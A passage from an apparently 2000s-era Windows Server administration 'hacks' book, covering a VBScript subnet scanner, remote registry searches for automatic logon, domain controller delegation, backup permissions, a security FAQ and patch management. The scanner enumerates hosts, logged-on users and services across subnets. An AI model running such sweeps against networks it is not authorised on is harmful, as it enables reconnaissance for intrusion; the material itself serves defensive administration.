+"the subnets.",Title,PathToScript & "\subnets.txt")
+
+If WshFso.FileExists(SubnetFileName) <> True Then
+MsgBox "The subnet file does not exist....GOODBYE", _
+vbok + vbcritical, Title
+Wscript.Quit(0)
+End If
+EditSubnets = MsgBox("Do you want to edit the subnets file?",vbyesno,Title)
+Select Case EditSubnets
+Case vbyes WshShell.Run "notepad " & SubnetFileName,1,True
+Case vbno
+End Select
+PathToLogFile = PathToScript & "\" & Title & "_" & Month(Now) & "_"
+& Day(Now) & "_" & Year(Now) & "-" & Hour(Now) & "_" &
+Minute(Now) & ".log"
+Set LogFile = WshFso.CreateTextFile(PathToLogFile)
+Set File = WshFso.GetFile(SubnetFileName)
+Set DataFile = File.OpenAsTextStream(1,0)
+
+LogFile.WriteLine "IPaddress" & vbtab & "ComputerName" & vbtab & _
+"LoginName" & vbtab & "Domain" & vbtab & "Status"
+Do While Not DataFile.AtEndOfStream
+Subnet = DataFile.ReadLine
+LogFile.WriteLine subnet & vbtab & vbtab & vbtab & vbtab & _
+"beginning subnet " & Now
+Discover(subnet)
+Loop
+MsgBox Title & " script is done. The log file is located here." & _
+vbcrlf & PathToLogFile
+Function Discover(boundary)
+Subnet = Left(boundary,InstrRev(boundary,"."))
+For i = 1 to 254
+IP = subnet & i
+CompName = Null
+User = Null
+
+Domain = Null
+Curline = Null
+Service = Null
+If ScriptNet.Ping(ip,,,Timeout) <> 0 Then
+LogFile.WriteLine IP & vbtab & vbtab & vbtab & vbtab _
+& "UnPingableClient"
+Else
+CompName = ScriptNet.DNSlookup(IP)
+If InStr(CompName,".") <> 0 Then
+CompName = Left(CompName,InStr(CompName,".")-1)
+End If
+Call GetNBTstat(IP,User,Domain)
+Call GetService(IP, Service)
+Call WriteToLog(IP,CompName,User,Domain,Service)
+End If
+Next
+End Function
+
+Function GetNBTstat(IP,User,Domain)
+WshShell.Run ComSpec & " /c nbtstat -a " & IP & " >" & PathToScript & _
+"\nbt.txt",6,True
+Set NbtFile = WshFso.OpenTextFile(PathToScript & "\nbt.txt", 1, True)
+Do While NbtFile.AtEndOfStream <> True
+CurLine = NbtFile.ReadLine
+If InStr(CurLine,"---") <> 0 Then
+CurLine = NbtFile.ReadLine
+CompName = Trim(Left(CurLine,InStr(CurLine,"<")-1))
+End If
+If InStr(CurLine,"<03>") <> 0 Then
+If Trim(Left(CurLine,InStr(CurLine,"<03>")-1)) <> _
+UCase(CompName) and Trim(Left(CurLine,InStr(CurLine,"<03>")-1)) <> _
+UCase(CompName) & "$" Then
+User = Trim(Left(CurLine,InStr(CurLine,"<03>")-1))
+End If
+End If
+
+If InStr(CurLine,"<1E>") <> 0 Then
+If Trim(Left(CurLine,InStr(CurLine,"<1E>")-1)) <> _
+UCase(CompName) and Trim(Left(CurLine,InStr(CurLine,"<1E>")-1)) <> _
+UCase(CompName) & "$" Then
+Domain = Trim(Left(CurLine,InStr(CurLine,"<1E>")-1))
+End If
+End If
+Loop
+NbtFile.Close
+End Function
+Function GetService(IP,Service)
+If CompName <> "" and User <> "" or Domain <> "" Then
+WshShell.Run ComSpec & " /c " & PathToScript & "\psservice \\" _
+& IP & " query " & Chr(34) & ServiceToCheck & Chr(34) & " >" _
+& PathToScript & "\service.txt",6,True
+Set ServFile = WshFso.OpenTextFile(PathToScript _
+
+& "\service.txt", 1, True)
+Do While ServFile.AtEndOfStream <> True
+CurLine = ServFile.ReadLine
+If InStr(CurLine,"STATE") <> 0 Then
+Service = Trim(Right(CurLine,InStr(CurLine," ")-1))
+End If
+If InStr(CurLine,"RPC") <> 0 Then
+Service = CurLine
+End If
+If InStr(CurLine,"Access") <> 0 Then
+Service = CurLine
+End If
+If InStr(CurLine,"function") <> 0 Then
+Service = CurLine
+End If
+If InStr(CurLine,"Unable") <> 0 Then
+Service = CurLine
+End If
+
+Loop
+If InStr(Service,vbcr) <> 0 Then
+Service = Left(Service,InStr(Service,vbcr)-1)
+End If
+End If
+End Function
+Function WriteToLog(IP,CompName,User,Domain,Service)
+If IP <> "" Then
+LogFile.Write IP
+End If
+LogFile.Write vbtab
+If CompName <> "" Then
+LogFile.Write CompName
+End If
+LogFile.Write vbtab
+If User <> "" Then
+
+LogFile.Write User
+End If
+LogFile.Write vbtab
+If Domain <> "" Then
+LogFile.Write Domain
+End If
+LogFile.Write vbtab
+If Service <> "" Then
+LogFile.Write Service
+End If
+LogFile.WriteLine
+End Function
+Running the Hack
+First, create a text file that contains the subnets you wish to
+query. Each subnet should end with .0 and be on its own line in
+the file. You can name the file subnets.txt and save it in the same
+directory as the script. Now, simply run the script by double-
+clicking on it; it will prompt you for input. The first input is just
+an introduction to the script. Clicking No will exit the script
+altogether.
+
+The next input is the name of the service; this is not the same
+as the display name, so be careful here. Table 8-3 shows some
+examples of services for which the display name differs greatly
+from the service name. This information can help you detect
+rogue web servers running secretly on your network, client
+machines whose antivirus software has been disabled, or
+machines with SMS client software disabled, making them
+difficult to keep updated with security patches and service
+packs.
+Table 8-3. Display names and corresponding
+service names
+Display name Service name
+World Wide Web Publishing Service w3svc
+Norton Antivirus Client Norton Antivirus Server
+SMS Client Service clisvc
+The next prompt is the full path to the text file that contains the
+subnets. At this point, you can enter a different text file if you
+wish. Lastly, you have the opportunity to modify the subnets file
+before you begin. The scan will begin either after you click No or
+after you close Notepad. You will be notified when the script is
+finished with a pointer to the log file; there is no progress
+indicator as the script runs. If you need to cancel the script, go
+into Task Manager and kill the wscript.exe process.
+
+I have used this script to find machines on which the SMS Client
+Service has been disabled. I have also found numerous IIS web
+servers and their owners. Lastly, this utility does a great job of
+finding the FLC service, which is better known as the FunLove
+virus. I get a big kick out of sending directors a list of developer
+machines that have FunLove on their box, have also disabled
+SMS, and are not running antivirus software.
+Always deploy this script in a lab
+environment first and do your own
+benchmarking before pinging those
+32,000 nodes.
+Dennis Abbott
+
+Hack 74 Grant Administrative Access to
+a Domain Controller
+Here's a hack that will help you secure any domain controllers
+you have running at a remote site.
+Active Directory has introduced many new levels of complexity
+to server and security management. For example, if you would
+like to grant a remote site administrator the rights to install
+software or services on a domain controller, that person would
+have to be a domain administrator. Granting that person domain
+administrator rights introduces the possibility of that user
+creating new accounts with administrative rights. Obviously, this
+is not an ideal situation.
+The following steps show how to grant a user the same level of
+rights as an administrator of a member server or a workstation
+on a domain controller, while preventing that user from having
+rights to Active Directory.
+Please note that this hack does not
+eliminate all possible security risks, and
+the users who are granted these rights
+need to be highly trusted
+
+1. Log onto a domain controller with full domain
+administrator rights. Make sure your Active Directory
+domain is in native mode.
+Inside of Active Directory Users and Computers, create a
+global security group called DCAdmins. Add all users/groups
+that will need administrative access to the domain controllers to
+this group.
+Create another global security group called DenyDCAdmins.
+Add the DCAdmins group to the DenyDCAdmins group.
+Inside of Active Directory Users and Computers, right-click
+on the domain name and choose Properties. Click on the
+Security tab (if the Security tab is not available, go to the View
+menu and choose Advanced).
+Click on Add and choose the DenyDCAdmins group. Once
+the group has been selected, click on the Deny checkbox next to
+Full Control in the Permissions area, as shown in Figure 8-4.
+Figure 8-4. Denying Full Control permission for
+the DenyDCAdmins global group
+
+Now, all users or groups that are members of the DCAdmins
+group have full administrative access to all domain controllers
+but do not have any access to Active Directory.
+
+These users won't even be able to browse
+Active Directory to apply permissions on
+shares or files. It is generally a best
+practice for these users to have two
+accounts: one for administering the
+domain controllers and another for day-to-
+day use.
+Overall, this is a great approach to limit security for remote
+administrators and operations teams that need to be able to
+make changes on domain controllers. I highly recommend trying
+this approach before blanketing your Active Directory
+environment with unnecessary domain administrators.
+Tim Mintner
+
+Hack 75 Secure Backups
+Protect critical business information by restricting who can back
+up and restore it.
+In a small organization, a single administrator might be
+responsible for backing up and restoring data stored on servers.
+In a large enterprise, however, it's more likely that
+administrative responsibilities will be delegated among various
+groups. Windows 2000 and Windows Server 2003 include
+special built-in groups for such purposes, but we'll also see how
+creating custom groups can give you even greater control over
+who can back up and restore your data.
+Using Backup Operators
+There are actually two different Backup Operators groups in
+Windows 2000 and Windows Server 2003: a local group and a
+domain local group. What's the difference between local and
+domain local groups? Local groups are defined in the SAM
+database on a member server or workstation, while domain local
+groups are stored in Active Directory on domain controllers. As
+a result, member servers and workstations have a built-in local
+group named Backup Operators, and membership of this group is
+modified by using Local Users and Groups in the Computer
+Management console.
+
+By contrast, domain controllers have a built-in domain local
+group also named Backup Operators, and membership in the
+group is modified using the Active Directory Users and Groups
+(ADUC) console (the group is located within the Built-in
+container for each domain).
+In the GUI, the domain local Backup
+Operators group is actually labeled as
+"Built-in local" instead of "Built-in domain
+local." This is an error in the GUI.
+So, what exactly can members of the Backup Operators group
+do? First, they can back up any file or folder on the server on
+which the group resides. This means that if you belong to the
+Backup Operators group on a member server, you can back up
+and restore files on that member server (and only that member
+server). But if you belong to the Backup Operators group on a
+domain controller, you can back up and restore files on any
+server in the domain. Backup Operators can also perform certain
+other tasks, such as interactively logging on to the console of
+the server and shutting the server down. And members of the
+built-in Server Operators group can do everything Backup
+Operators can, in addition to being able to create and manage
+shared folders and printers.
+So, who belongs to the Backup Operators group? By default,
+nobody. The idea is that these users have a powerful abilityto
+make copies of sensitive business data and restore these
+copies to another machineso you should think carefully before
+
+you make anyone a member of this group.
+How do Backup Operators get these abilities? By the user rights
+assigned to them. User rights indicate authorization or privilege
+to perform some task and are assigned by using Group Policy (in
+an Active Directory environment) or Local Security Policy (on
+standalone servers in a workgroup). In a Group Policy Object
+(GPO), user rights are found under Computer Configuration
+Windows Settings Security Settings Local Policies
+User Rights Assignment (see Figure 8-5).
+Figure 8-5. User rights displayed in Group Policy
+
+By default both the Backup Operators and Administrators built-
+in groups are assigned the following user rights:
+Back up files and directories
+Restore files and directories
+Again, on a domain controller, the Server Operators group also
+
+has these rights by default. What's interesting about these two
+privileges is that they override any NTFS permissions that files
+and directories might have. Thus, even if the Backup Operators
+group is explicitly denied Read permission to a folder, members
+of this group can still back up the folder and its contents. In
+other words, user rights take precedence over permissions.
+Mind you, there is a hack that enables a user to back up files
+and folders on a machine without assigning them the preceding
+rights. The trick is to assign them, at a minimum, the following
+special NTFS permissions on the file or folder:
+Traverse folder/execute file
+List folder/read data
+Read attributes
+Read extended attributes
+Read permissions
+You might use this method to grant a user the ability to back up
+copies of sensitive documents to a local folder on his
+workstation. By assigning these permissions, users can back up
+the contents of the folder but can't read the files stored in it. The
+rational for using this approach, instead of assigning the
+necessary rights to the user, is that for security reasons you
+might want to ensure that the user has as few rights as possible,
+in case the user's account is compromised by an intruder. In
+
+other words, though this approach is more complicated, it can
+help guard against elevation of privilege attacks.
+Restricting Access to Backups
+A company's disaster recovery plan often overlooks the fact
+that those who perform backups shouldn't necessarily be the
+ones who restore from backups when things go wrong. That's
+because performing a backup is a routine administrative task
+that should be done regularly and delegated to some responsible
+user, but restoring a backup can actually provide the user with
+access to the backed-up data itself. For example, by restoring a
+backup job to a rogue server on the network and then running
+cracking tools locally on the server, the user could gain access
+to sensitive data and compromise the company's business.
+The solution is to ignore the built-in Backup Operators group
+and create two new security groups instead. For instance, you
+might name them something mundane, like Backup Group and
+Restore Group, or something more creative if you prefer. Then,
+assign the right to "Back up files and directories" to Backup
+Group and "Restore files and directories" to Restore Group.
+Don't assign any other rights to these two groups.
+Now, assign selected users to each group as desired. Typically,
+the membership of Backup Group is be more inclusive than
+Restore Group and should include both junior administrators
+(who have actual responsibility for day-to-day backups) and
+senior administrators (who can be there in a pinch if things go
+wrong). Of course, the junior administrators should not be
+members of the default Domain Admins group; if they are, they
+will automatically have the "Restore files and directories"
+privilege as well.
+
+The Restore Group, however, should have only senior
+administratorsthe most trusted members of your IT
+departmentas members. Whether or not they are all domain
+administrators is another question; best practice suggests that
+membership in Domain Admins should be as highly restricted as
+possible, and potential members of this group should be
+carefully screened during your company's hiring process. If you
+think one bad apple spoils the bunch, wait till you see what one
+corrupt administrator can do to your business!
+If you assign the "Back up files and
+directories" right to a group and then find
+that a user who belongs to this group has
+difficulty backing up one or more volumes,
+check the disk quota restrictions on those
+volumes to ensure they aren't restricting
+the user from accessing those volumes.
+Another approach you can use to secure your backups is to take
+advantage of a setting available on the Backup Job Information
+dialog box (see Figure 8-6). This dialog box appears after you
+start the Backup utility, select the volumes or folders you want
+to back up, and click the Start Backup button. By selecting the
+checkbox labeled "Allow only the owner and the Administrator
+access to the backup data," you configure permissions on the
+backup job so that only the individual who created the backup
+and the default administrator account can restore the backup.
+
+Figure 8-6. Allowing only the backup owner and
+administrator to restore the backup
+While this approach is easier than the approach I described
+earlier, it doesn't provide the same level of security as
+separating those who can restore data from those who back it
+up. Also, you can enable this setting only if you are backing up
+to a new tape or overwriting an old one; if you're appending your
+backup set to an existing tape, the setting is not available. In
+other words, the restriction offered by this setting is applied on a
+tape-by-tape basis, not a job-by-job basis. So, the lesser
+degree of security offered by this approach, coupled with its lack
+of flexibility, leads me to suggest you avoid using this setting
+and instead use the two-group approach I described previously.
+
+Hack 76 Find Computers with Automatic
+logon Enabled
+Having automatic logon enabled on a computer can be a security
+risk. Here's a quick way to find out which machines on your
+network have automatic logon enabled.
+While enabling automatic logon [Hack #4] in Chapter 1 can be
+useful in certain scenarios, such as a test network, it can also
+be a security risk, especially if it is enabled on a computer
+without the administrator's knowledge. Here is a quick and dirty
+way to locate all machines that have automatic logon enabled in
+their Registry.
+You'll need the following tools:
+The regfind.exe utility, which is available from the
+Windows NT/2000 resource kits.
+A list of machines to search, which can be obtained in
+many different ways (including an SMS report, server
+manager, etc.). The list should be a plain text file named
+serverlist.txt in the following format:
+server1
+
+server2
+server3
+server4
+etc...
+A user account that has administrative rights to the
+Registry on the machines being queried. Typically, a
+domain administrator account will work just fine.
+Create a batch file that will use the provided list and kick off
+regfind. For this we will use the FOR DOS command (all on one
+linetext is wrapped here to fit the constraints of the page):
+for /F %%A in (serverlist.txt) do (regfind.exe -m \\%%A -p "hkey_local_machine\software\
+microsoft\windows nt\currentversion\winlogon" -n "Autoadminlogon" >results.txt)
+You can see that we are simply parsing the serverlist.txt file for
+each server name, then instructing regfind to locate that
+Registry key. There are two caveats, though. First, the results
+can be hard to read while the search is going on. It is
+recommended that you pipe the results to a text file (the
+preceding example does this). Second, regfind is case-
+sensitive. This can make the search a bit longer, but it's still
+fairly easy. Instead of just a one-line batch file, you simply have
+a few more (almost identical) lines. A larger sample of the
+completed batch file looks something like this (again, all on one
+linebeware of line wrap):
+for /F %%A in (serverlist.txt) do (c:\work\adminlogon\regfind.exe -m \\%%A
+
+-p "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" -n
+"Autoadminlogon" >results.txt)
+for /F %%A in (serverlist.txt) do (c:\work\adminlogon\regfind.exe -m \\%%A
+-p "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" -n
+"AutoadminLogon" >results.txt)
+for /F %%A in (serverlist.txt) do (c:\work\adminlogon\regfind.exe -m \\%%A
+-p "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" -n
+"AutoAdminlogon" >results.txt)
+for /F %%A in (serverlist.txt) do (c:\work\adminlogon\regfind.exe -m \\%%A
+-p "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" -n
+"AutoAdminLogon" >results.txt)
+for /F %%A in (serverlist.txt) do (c:\work\adminlogon\regfind.exe -m \\%%A
+-p "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" -n
+"autoAdminlogon" >results.txt)
+for /F %%A in (serverlist.txt) do (c:\work\adminlogon\regfind.exe -m \\%%A
+-p "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" -n
+"autoadminlogon" >results.txt)
+
+for /F %%A in (serverlist.txt) do (c:\work\adminlogon\regfind.exe -m \\%%A
+-p "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" -n
+"autoAdminLogon" >results.txt)
+for /F %%A in (serverlist.txt) do (c:\work\adminlogon\regfind.exe -m \\%%A
+-p "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" -n
+"autoadminLogon" >results.txt)
+Using this method, you can scan a select list of
+workstations/servers for this key fairly quickly.
+Hacking the Hack
+This procedure can easily be modified to find out other Registry
+keys as well, simply by changing the key name to search for.
+Enjoy!
+Donnie Taylor
+
+Hack 77 Security FAQ
+Rod Trent, CEO of myITforum.com, shares his answers to
+common security questions.
+At myITforum.com (http://www.myitforum.com), we often get
+questions regarding general network-security issues, and I try
+to answer them in the form of a Security FAQ. Here's a short
+selection of the most common questions we receive, along with
+my responses. You can find more security tips at
+myITforum.com.
+Steps to Computer Security
+What can I do to make sure my computer is secure?
+It depends on whether you are a consumer or a business.
+Consumers
+Consumers should start by using an Internet firewall on all PCs
+and laptops. An Internet firewall can help prevent outsiders from
+getting to your computer through the Internet. If you use
+Windows XP, enable the built-in firewall feature on that platform.
+
+You should also update your computer regularly, either by using
+the Automatic Updates feature or by regularly visiting the
+Windows Update web site to download the latest Microsoft
+security updates. Also, make sure your antivirus software is up-
+to-date; installing, configuring and maintaining your antivirus
+software is absolutely essential.
+Businesses
+Businesses should follow a similar but more involved procedure.
+Start by verifying the configuration of your firewalls for both
+Internet and intranet. By auditing your firewall configurations,
+you ensure they comply with your company's security policy.
+Firewalls are your first line of defense, and best practice requires
+blocking all ports that are not actually being used by
+applications on your network. Business should also protect their
+networks by requiring employees to follow the precautions
+outlined by Microsoft (http://www.microsoft.com/protect/) on
+both their home PCs and laptops, especially if they use these
+machines to connect to your enterprise. PCs and laptops that
+VPN or RAS into your network must be protected by a properly
+configured firewall.
+Businesses must also keep their systems up-to-date with the
+latest security patches from Microsoft. To do so, subscribe to
+Microsoft's free security notification service and use Microsoft
+update services to automatically obtain patches for your
+network, see [Hack #78] for more information. Finally, business
+should invest in antivirus software, because such protection is
+absolutely essential for keeping sensitive business data safe
+from attackers.
+
+Vulnerability Types
+Q: What are the vulnerability types that I need to monitor against?
+A: There are three basic types of vulnerability:
+Administrative vulnerability
+The failure to observe administrative best practices,
+such as using a weak password or logging onto an
+account that has more user rights than the user requires
+to perform a specific task.
+Product vulnerability
+A security-related bug in a product that is addressed by
+a security bulletin/hotfix or a service pack.
+Physical vulnerability
+The failure to provide physical security for a computer.
+Physical vulnerability can include leaving an unlocked
+workstation running in an area that is accessible to
+unauthorized users, leaving a server room unlocked or
+open, or losing a laptop or leaving it at a customer site.
+Strong Password Policy
+
+Q: What is the best practice to follow when creating policies for
+user passwords?
+A: Each company's security-level needs are different, but in
+general, strong passwords should be at least six characters
+long, should not contain all or part of the user's account name,
+and should contains at least three of the four following
+categories of characters: uppercase letters, lowercase letters,
+Base 10 digits, and nonalphanumeric symbols found on the
+keyboard, such as !, @, and #.
+How Microsoft Handles Security
+Q: Is there any documentation on how Microsoft handles security
+against worms and viruses?
+A: Yes. Microsoft has released a "Security at Microsoft" white
+paper on how they handle security issues
+(http://www.microsoft.com/downloads/details.aspx?
+FamilyID=73f1ba8e-a15c-4c05-be87-8d21b1372485). This
+paper describes what Microsoft's Corporate Security Group does
+to prevent malicious or unauthorized use of digital assets at
+Microsoft. This asset protection takes place through a formal
+risk-management framework, risk-management processes, and
+clear organizational roles and responsibilities. The basis of the
+approach is recognition that risk is an inherent part of any
+environment and that risk should be proactively managed. The
+principles and techniques described in Microsoft's white paper
+can be employed to manage risk at any organization.
+Reporting Security Incidents to Microsoft
+
+Q: How can I report a security incident or vulnerability to Microsoft?
+A: If you have purchased Microsoft support, you should contact
+your Technical Account Manager (TAM). You can also use the
+web form at
+https://s.microsoft.com/technet/security/bulletin/alertus.asp to
+submit incidents and vulnerabilities.
+Reporting Security Incidents to
+Government Authorities
+Q: We've just had a security incident. Who can I call to report it?
+A: The FBI encourages the public to report any suspected
+violations of U.S. federal law. Never think that your security
+incident is insignificant. Your incident might be part of a larger
+attack or the beginning of a larger attack. You can find your local
+FBI Field Division information at
+http://www.fbi.gov/contact/fo/fo.htm.
+Getting Government Security Clearance
+Q: How can you apply for security clearance for a government
+job?
+A: In our daily newsletter at myITforum.com
+(http://www.myitforum.com/newsletter.asp), we sometimes post
+open positions for jobs in the government sector that require
+special security clearance before applying. Several folks have
+wondered what it takes to get the security clearance, and a list
+of good tidbits of information were posted to the myITforum.com
+
+Off-Topic list (http://www.topica.com/lists/myOTforum/). Here
+are some additional places you can find information on
+government security clearance:
+FBI Information Sheet:
+http://www.fbi.gov/clearance/securityclearance.htm
+Security Clearance for IT Pros:
+http://www.jobcircle.com/career/coach/jf_2002_09.html
+Security Clearances:
+http://www.taonline.com/securityclearances/
+Rod Trent
+
+Hack 78 Microsoft Security Tools
+Here's a quick guide to various tools from Microsoft to help
+secure your systems against attack.
+This list represents my personal take on the wide variety of
+security tools currently offered by Microsoft. It includes tools for
+security assessment, patch management, security scanning,
+system updating, lockdown, auditing, intrusion detection, virus
+protection, and system cleaning. There's also a brief list of RFCs
+that every security professional (including those who work with
+platforms other than Windows) should become familiar with.
+I plan to update this list at myITforum.com
+(http://www.myitforum.com) as new items become available. If
+you have any suggestions to add to the list, drop me a note at
+myITforum@cinci.rr.com.
+Assessment, Patch Management, and
+Software Update Services and Tools
+The Microsoft Baseline Security Analyzer (MBSA)
+(http://www.microsoft.com/technet/security/tools/Tools/mbsahome.asp
+is a popular security tool that scans single systems or multiple
+systems across a network for common system
+misconfigurations and missing security updates.
+
+Software Update Services (SUS)
+(http://www.microsoft.com/windowsserversystem/sus/default.mspx
+simplifies the process of keeping Windows-based systems up-
+to-date with the latest critical updates. See [Hack #89] in
+Chapter 9 for tips on using this tool.
+QChain (http://support.microsoft.com/default.aspx?
+scid=KB;EN-US;296861) allows administrators to script the
+installation of several patches without requiring multiple
+reboots. To use this tool, you create a batch file to update your
+security configuration with hotfixes. Note that QChain is not
+required if you are running Windows 2000 Service Pack 3 or
+later, or more recent versions of Windows, such as XP and 2003.
+Finally, the KB 824146 Scanning Tool
+(http://support.microsoft.com/default.aspx?scid=kb;en-
+us;827363) can be used to identify computers on networks that
+do not have the 823980 (MS03-026) and the 824146 (MS03-
+039) security patches installed.
+Automatic Scan and Update Tools for
+Windows and Office
+To keep your operating system up-to-date with patches, use the
+Windows Update web site (http://windowsupdate.microsoft.com),
+which scans your computer and provides a selection of updates
+tailored for your operating system, software, and hardware. For
+updating Microsoft Office products, use the Microsoft Office
+Product Updates web site
+(http://office.microsoft.com/officeupdate/default.aspx).
+
+Lockdown, Auditing, and Intrusion
+Detection Tools
+The IIS Web Server Lockdown Wizard
+(http://www.microsoft.com/technet/security/tools/tools/locktool.asp
+works by reducing the attack surface of Internet Information
+Services and includes URLScan to provide multiple layers of
+protection against attackers. Note that this tool is designed only
+for IIS 5 (Windows 2000); because IIS 6 (Windows Server
+2003) has this functionality built into it, a download isn't
+necessary for that platform.
+The UrlScan Security Tool
+(http://www.microsoft.com/technet/security/tools/tools/URLScan.asp
+helps prevent potentially harmful HTTP requests from reaching
+IIS web servers. This tool also is designed mainly for IIS 5,
+because much (but not all) of the functionality of UrlScan is built
+into IIS 6.
+EventCombMT is available as part of the Security Guide Scripts
+Download (http://www.microsoft.com/downloads/details.aspx?
+FamilyID=9989D151-5C55-4BD3-A9D2-B95A15C73E92).
+This multithreaded tool parses event logs from many servers at
+the same time, which is highly useful for monitoring your event
+logs for signs of intrusion.
+The Cipher Security Tool for Windows 2000
+(http://www.microsoft.com/technet/security/tools/tools/cipher.asp
+permanently overwrites deleted data on hard drives. It's
+basically a replacement for the cipher command used to manage
+the Encrypting File System (EFS) from the command line.
+
+Virus Protection and Cleaner Tools
+The Office 2000 Update Service Pack 3
+(http://www.microsoft.com/downloads/details.aspx?
+FamilyID=5C011C70-47D0-4306-9FA4-8E92D36332FE)
+includes the Outlook 2000 SR1 E-mail Security Update
+(OESU), which prevents users from accessing several
+potentially dangerous file types when sent as email
+attachments. It also increases the default security zone
+settings within Outlook.
+The SQL Server 2000 Security Tools
+(http://www.microsoft.com/downloads/details.aspx?
+FamilyId=9552D43B-04EB-4AF9-9E24-6CDE4D933600) can
+help you determine whether your computer or environment is
+vulnerable to the Slammer worm.
+Top Security RFCs
+Finally, here are some Request For Comment (RFC) documents
+that every security professional should become familiar with.
+These RFCs apply to any enterprise networking environmentpure
+Microsoft, mixed Windows/Unix, or pure Unix:
+RFC 2196 Site Security Handbook (ftp://ftp.rfc-editor.org/in-
+notes/rfc2196.txt)
+Describes how to develop security policies and
+procedures for sites connected to the Internet
+
+RFC 2504 Users' Security Handbook (ftp://ftp.rfc-editor.org/in-
+notes/rfc2504.txt)
+Similar to the Site Security Handbook, but designed for
+users.
+RFC 2350 Expectations for Computer Security Incident
+Response (ftp://ftp.rfc-editor.org/in-notes/rfc2350.txt)
+Describes expectations for computer security incident
+response teams.
+These RFCs are also worth skimming through:
+RFC2828 Internet Security Glossary (ftp://ftp.rfc-editor.org/in-
+notes/rfc2828.txt)
+A glossary of security terms and abbreviations
+RFC 2577 FTP Security Considerations (ftp://ftp.rfc-
+editor.org/in-notes/rfc2577.txt)
+A collection of tips on how to implement FTP servers
+securely
+RFC 3013 Recommended Internet Service Provider Security
+Services and Procedures (ftp://ftp.rfc-editor.org/in-
+notes/rfc3013.txt)
+Describes expectations of security for ISPs
+
+Rod Trent and Mitch Tulloch
+
+Chapter 9. Patch
+Management
+Hacks #79-89
+Section 79. Best Practices for Patch Management
+Section 80. Beginners Guide to Enterprise Patch
+Management
+Section 81. Patch-Management FAQ
+Section 82. Enumerate Installed Hotfixes
+Section 83. Apply Patches in the Correct Order
+Section 84. Windows Update FAQ
+Section 85. Obtain Updates via the Windows Update
+Catalog
+Section 86. Use Automatic Updates Effectively
+Section 87. Use Group Policy to Configure Automatic
+Updates
+Section 88. Automatic Updates FAQ
+Section 89. Software Update Services FAQ
+
+Hacks #79-89
+Patch management is a way of life for system administrators
+nowadays. With the proliferation of Internet worms and other
+threats, new patches are being released for Windows platforms
+on an almost weekly basis. Testing these patches and deploying
+them on production systems takes time and energy.
+Occasionally, something goes wrong and a patch designed to
+correct one problem actually creates another.
+The first key to effective patch management is proper business
+practices: test, deploy, and verify. The second key is proper
+tools. Windows 2000 Windows Server 2003 come with built-in
+several tools, while others can be obtained from Microsoft's web
+site and third-party vendors. The third key is knowledgeknowing
+how patch-management tools work and how to troubleshoot them
+when things go wrong. The hacks in this chapter touch on all
+three keys to effective patch management and help enlarge your
+understanding and skills in this crucial area of a system
+administrator's job description.
+
+Hack 79 Best Practices for Patch
+Management
+By understanding the different kinds of patches and following a
+simple regime, you can keep your critical systems free from
+known vulnerabilities.
+Patch management is probably the biggest concern of IT
+departments these days. With new vulnerabilities being
+discovered almost every week, keeping systems up-to-date with
+patches is often a full-time job, especially in large enterprises.
+In addition, the lag time between when a vulnerability is
+discovered and when a virus or worm appears in the wild is now
+measured in weeks rather than months. This puts tremendous
+pressure on vendors to release patches before they've even
+been fully regression-tested. The result is that sometimes
+patches fix the problem they're designed to address but break
+something else unintentionally in the process. Customers often
+blame vendors in such circumstances but, let's face it, there's a
+war going on and, like most wars, it's messy.
+Patch Flavors
+Before you plan a patch-management strategy, it's important to
+understand the differences between the various different flavors
+of patches. Microsoft classifies patches into three basic
+
+categories: hotfixes, roll-ups, and service packs.
+Hotfixes
+Hotfixes are small patches designed to fix a single problem and
+are developed either in response to a security advisory or by
+customer request. Hotfixes are typically issued either to plug
+security holes, such as buffer overflows, or to fix features that
+don't behave as intended. Not all patches are created equal;
+hotfixes that address broken functionality are developed by
+Quick Fix Engineering (QFE) teams at Microsoft Product
+Support Services (PSS), whereas those that address security
+vulnerabilities are identified and developed by the Microsoft
+Security Resource Center (MSRC).
+Roll-ups
+Occasionally, Microsoft combines several hotfixes together into
+a single package called a roll-up. This is typically done when
+several security issues have been identified within a short time
+interval, and its purpose is to simplify the job of installing
+hotfixes for administrators. Unfortunately, this is not always a
+good idea. There have been instances in which installing
+multiple patches broke applications, and the headache then
+arises: figuring out which patch in the roll-up actually caused
+the problem.
+
+Service packs
+At pretty regular intervals, Microsoft combines all hotfixes
+issued for a platform into a single package called a service pack.
+These service packs are cumulativefor instance, Service Pack 3
+includes all hotfixes issued both before and since Service Pack
+2 appeared. While service packs undergo more thorough testing
+than individual hotfixes, there have nevertheless been a few
+instances in which a service pack caused new problems while
+solving others.
+MSRC Ratings System
+Hotfixes that address security vulnerabilities are also called
+security fixes, and the MSRC rates these according to a four-
+point scale from high to low. This is a useful scheme for
+administrators, because it allows them to decide which fixes
+should be applied as soon as possible and which can be deferred
+until later or even ignored. The ratings also refer to the types of
+vulnerabilities they guard against. An example of a critical issue
+might be a self-propagating Internet worm that can bring servers
+to their knees and wreak other kinds of havoc, while important
+means that your confidential business information might be at
+risk of being lost, stolen, or corrupted. Moderate means you have
+a properly configured firewall and are following good security
+practices, so you won't likely to be affected by this problem,
+though it's still possible. Finally, low means it would take a
+combination of a genius hacker and a totally negligent system
+administrator for this exploit to occur (but it's still remotely
+possible).
+
+Strategies for Patch Management
+My own strategy for effective patch management can be
+summarized as Policy, Process, Persistence (PPP). Let me unravel
+this, along with some helpful recommendations from Microsoft.
+Policy
+The first step in developing a patch management strategy is to
+develop a policy that outlines the who, what, how, when, and why
+of patching your systems. That takes planning, and with
+administrators being as busy as they are these days, it's
+difficult to allocate time for proper planning. Still, planning is
+essential. My view is that the difference between planning and an
+ad hoc fix-it-when-it's-broke approach is the difference between
+peace of mind and success, and constant anxiety and a disaster
+waiting to happen.
+It all boils down to being proactive instead of reactive. Proactive
+management anticipates problems in advance and develops
+policies to deal with them; reactive management adds layer upon
+layer of hastily thought-up solutions patched together using bits
+of string and glue. It's easy to see which approach will unravel in
+the event of a crisis. Once you have a patch-management policy
+in place (usually it's part of your overall security policy) and a
+notification arrives of a critical vulnerability in some product,
+you immediately know who will deal with it, which tools will be
+used to deploy the patch, whether it needs to be done sooner or
+later, and so on. For example, a simple element of a patch-
